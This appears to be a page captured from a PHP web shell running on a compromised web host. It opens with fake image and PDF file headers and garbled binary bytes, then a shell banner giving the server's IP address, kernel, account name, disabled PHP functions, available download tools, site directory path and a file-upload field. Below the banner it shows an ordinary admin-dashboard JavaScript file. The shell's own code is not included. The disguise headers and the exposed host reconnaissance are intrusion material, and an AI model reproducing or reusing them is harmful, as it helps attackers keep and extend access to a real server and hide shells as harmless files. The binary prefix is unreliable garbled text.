ÿØÿà JFIF ÿþ; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 82.197.83.129 / Your IP : 216.73.216.166 [ Web Server : LiteSpeed System : Linux us-bos-web1456.main-hosting.eu 4.18.0-553.40.1.lve.el8.x86_64 #1 SMP Wed Feb 12 18:54:57 UTC 2025 x86_64 User : u489457460 ( 489457460) PHP Version : 7.3.33 Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail Domains : 2 Domains MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/u489457460/domains/syoft.com/public_html/blogs/admin_css/js/ |
Upload File : |
$(function(){ 'use strict' // Toggles $('.toggle').toggles({ on: true, height: 26 }); // Input Masks $('#dateMask').mask('99/99/9999'); $('#phoneMask').mask('(999) 999-9999'); $('#ssnMask').mask('999-99-9999'); // Time Picker $('#tpBasic').timepicker(); $('#tp2').timepicker({'scrollDefault': 'now'}); $('#tp3').timepicker(); $('#setTimeButton').on('click', function (){ $('#tp3').timepicker('setTime', new Date()); }); // Color picker $('#colorpicker').spectrum({ color: '#2b88ff' }); $('#showAlpha').spectrum({ color: 'rgba(0, 97, 218, 0.5)', showAlpha: true }); $('#showPaletteOnly').spectrum({ showPaletteOnly: true, showPalette:true, color: '#DC3545', palette: [ ['#1D2939', '#fff', '#0866C6','#23BF08', '#F49917'], ['#DC3545', '#17A2B8', '#6610F2', '#fa1e81', '#72e7a6'] ] }); }); $(function(){ 'use strict'; $('#datatable1').DataTable({ responsive: true, language: { searchPlaceholder: 'Search...', sSearch: '', lengthMenu: '_MENU_ items/page', } }); $('#datatable2').DataTable({ bLengthChange: false, searching: false, responsive: true }); // Select2 $('.dataTables_length select').select2({ minimumResultsForSearch: Infinity }); }); $(function(){ 'use strict' // Datepicker $('.fc-datepicker').datepicker({ showOtherMonths: true, selectOtherMonths: true }); $('#datepickerNoOfMonths').datepicker({ showOtherMonths: true, selectOtherMonths: true, numberOfMonths: 2 }); });